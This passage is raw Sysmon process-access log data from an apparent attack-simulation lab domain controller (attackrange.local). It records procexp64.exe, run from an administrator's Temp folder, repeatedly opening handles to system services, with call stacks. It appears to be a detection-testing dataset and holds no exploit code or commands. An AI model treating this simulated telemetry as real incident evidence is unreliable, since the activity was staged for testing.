Files\SplunkUniversalForwarder\bin\splunkd.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787353Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787352Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787351Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787350Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787349Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787348Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787347Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787346Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787345Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787344Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787343Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787342Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787341Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787340Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787339Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787338Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787337Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787336Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787335Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787334Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787333Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787332Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787331Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000787330Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:10.658{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program 